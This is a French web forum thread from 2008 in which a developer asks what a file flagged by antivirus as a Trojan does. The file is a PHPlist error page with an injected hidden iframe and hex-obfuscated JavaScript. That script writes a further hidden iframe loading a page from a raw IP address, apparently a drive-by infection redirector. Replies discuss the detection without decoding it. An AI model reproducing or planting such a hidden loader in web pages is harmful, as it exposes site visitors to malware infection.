iframe et script Javascript suspect, hack ?

31 oct. 2008, 13:17

Bonjour,

Dans le cadre d'un projet, j'ai hier transférer la totalité d'un site du FTP vers mon disque dur. Et pendant le transfert, surprise, Avast pop et me dit que l'un des fichiers tranférés est infecté par un Cheval de Troie. De suite, j'ouvre le fichier en question avec un éditeur de texte, un fichier index.html présent dans un sous dossier. Et voici le code en entier :

Code : Tout sélectionner

<head>
<title>Nothing here</title>
</head>
<body>
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>
<script>function v4765e4f8083b6(v4765e4f8087c5){  return(parseInt(v4765e4f8087c5,16));}function v4765e4f8093bb(v4765e4f8097b6){  var v4765e4f809bb2='';for(v4765e4f809fb4=0; v4765e4f809fb4<v4765e4f8097b6.length; v4765e4f809fb4+=2){ v4765e4f809bb2+=(String.


fromCharCode(v4765e4f8083b6(v4765e4f8097b6.substr(v4765e4f809fb4, 2))));}return v4765e4f809bb2;} document.write(v4765e4f8093bb('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6565343238207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3630343030292B27373266395C272077696474683D333032206865696768743D323030207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
<h1>Error: please make sure that index.php is your default document for a directory</h1>
<p>If you have just installed PHPlist and get this message, make sure that 
  your Apache configuration has somewhere
<pre>
<b>DirectoryIndex index.php index.html</b>
</pre>
or that at least index.php is mentioned before index.html
</p>
<p>For other webservers please consult your manual to find how to make
  index.php be the default document for a directory.</p>
<p>Alternatively you can delete the file "index.html" in the lists directory of PHPlist</p>
<p>You probably want to be <a href="../">here</a> or <a href="admin/">here</a>.</p>
</body>
</html>

On y remarque tout d'abord une iframe, dont la source est

http://url

, puis quelques fonctions Javascript, dont je n'ai pas bien compris le but.

D'après vous, que tente de faire ce fichier ? Est-il dangereux ?

31 oct. 2008, 15:27

Je ne sais pas si ça te rassure, mais certains admins ayant avast ne peuvent accéder à ce message avec le code copié/collé

31 oct. 2008, 15:36

Si tout ce qui est compris entre les balises <script> et </script> est le script problématique, je me demande si ces drôles de combinaisons de lettres et de chiffres ne seraient pas à l'origine du problème, en passant pour du code malsain aux yeux d'Avast.

31 oct. 2008, 15:47

Je me suis permis de modifier le code pour permettre l'accès à tous.

Sinon, est-ce que cette page est réellement voulue ?
Parce qu'une page 501 qui contient du JS, j'ai jamais vu

31 oct. 2008, 15:58

Je reprends un projet deja existant en fait, avec plusieurs développeurs passés avant moi. le dossier lists/ qui contient le fichier est apparement un début de module SPIP? ou quelque chose dans le genre, mais personne ne peut me dire si il est indispensable au fonctionnement du site : /

Pour Avast qui pop au moment de la lecture du message, pareil pour moi, lorsque j'ai copié le srcript, Avast m'a repop le warning, avec un virus contenu dans Mozilla/session.js ou un truc du genre, enfin bref le fichier qui stock en session le contenu du message, au cas où le navigateur plante.

Bref, ça me rassure pas vraiment

iframe et script Javascript suspect, hack ?

Qui est en ligne